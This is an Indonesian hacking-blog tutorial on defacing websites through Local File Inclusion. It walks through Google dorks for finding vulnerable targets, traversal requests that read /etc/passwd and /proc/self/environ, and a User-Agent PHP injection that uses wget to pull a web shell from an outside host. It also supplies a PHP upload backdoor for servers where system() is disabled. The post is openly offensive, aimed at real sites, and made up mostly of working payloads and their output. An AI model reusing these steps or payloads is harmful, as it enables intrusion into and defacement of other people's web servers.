• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Cara Deface Website dengan Teknik Local File Inclusion

April 29, 2015 by Jack Wilder 2 Comments

Tutorial LFI – Cara Deface Website dengan Teknik Local File Inclusion. Sebenernya ini exploit lama banget. Malah bisa dibilang basic kalo kalian pengen belajar pentest web. Setara sama SQLi lah . Tapi post aja biar isi blog nya lengkap, sebagai arsip pribadi juga hehe.
Langsung saja, disini yang dibutuhkan cuma Browser Mozilla dengan addons tamper data.

Google Dorks :

  • inurl:/view/lang/index.php?page=?page=
  • inurl:/shared/help.php?page=

Use your brain , b1tch !
Saya anggep sudah dapat site vuln nya.
Pertama, test basic apa web tersebut vuln LFI.

  • localhost/view.php?page=email.php

Coba ganti email.php dengan ../../

  • localhost/view.php?page=../../

Jika kalian dapat error seperti

Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

Viola ! 😀 Ada kesempatan untuk membuka localfile yang lebih sensitif 😀
Kita coba panggil file /etc/passwd nya .

  • localhost/view.php?page=etc/passwd

Masih error ?

Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

Kita coba naikkan direktori nya.

  • localhost/view.php?page=../../../../../etc/passwd

Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin

…. dsb :p

Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak. Karena disinilah proses inject backdoor akan dimulai.

  • localhost/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80

Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.
Langkah selanjutnya, aktifkan tamper data.
Load halaman localhost/view.php?page=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di addons tamper data tadi isi dengan

<?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>

Lalu submit.

Shell kalian akan terletak di

  • localhost/fvck.php

Pada beberapa kasus, fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget melalui cara diatas.
Tapi ada cara lain.
Pad user-agent masukkan script uploader berikut :

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
<h1> shu </h1></p>
<br> <form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>

Setelah diupload, maka shell akan terletak di root path domain.

Jika masih bingung, berikut videonya:

Sekian tutor kali ini semoga bermanfaat.

Filed Under: LFI, Tutorial Deface, Web Hacking Tagged With: Deface, Exploit, Hacking, Tutorial

Reader Interactions

Comments

  1. x says

    August 17, 2024 at 5:29 pm

    Reply
    • x x says

      August 17, 2024 at 5:30 pm

      Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cara Deface Website dengan Teknik Local File Inclusion

Deface dengan Metode Timthumb Remote Code Execution

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

MIME Type Sniffing pada Form Upload Gambar

MyBB 1.8.x SQL Injection Auto Exploit

RCE pada Redis via Master-Slave Replication

Deteksi Kerentanan Execution After Redirect (EAR)

Hack Targeted Website using Reverse IP

Uptimerobot.com Custom Domain or Subdomain Takeover

LinuxSec / 12 queries in 0.09 seconds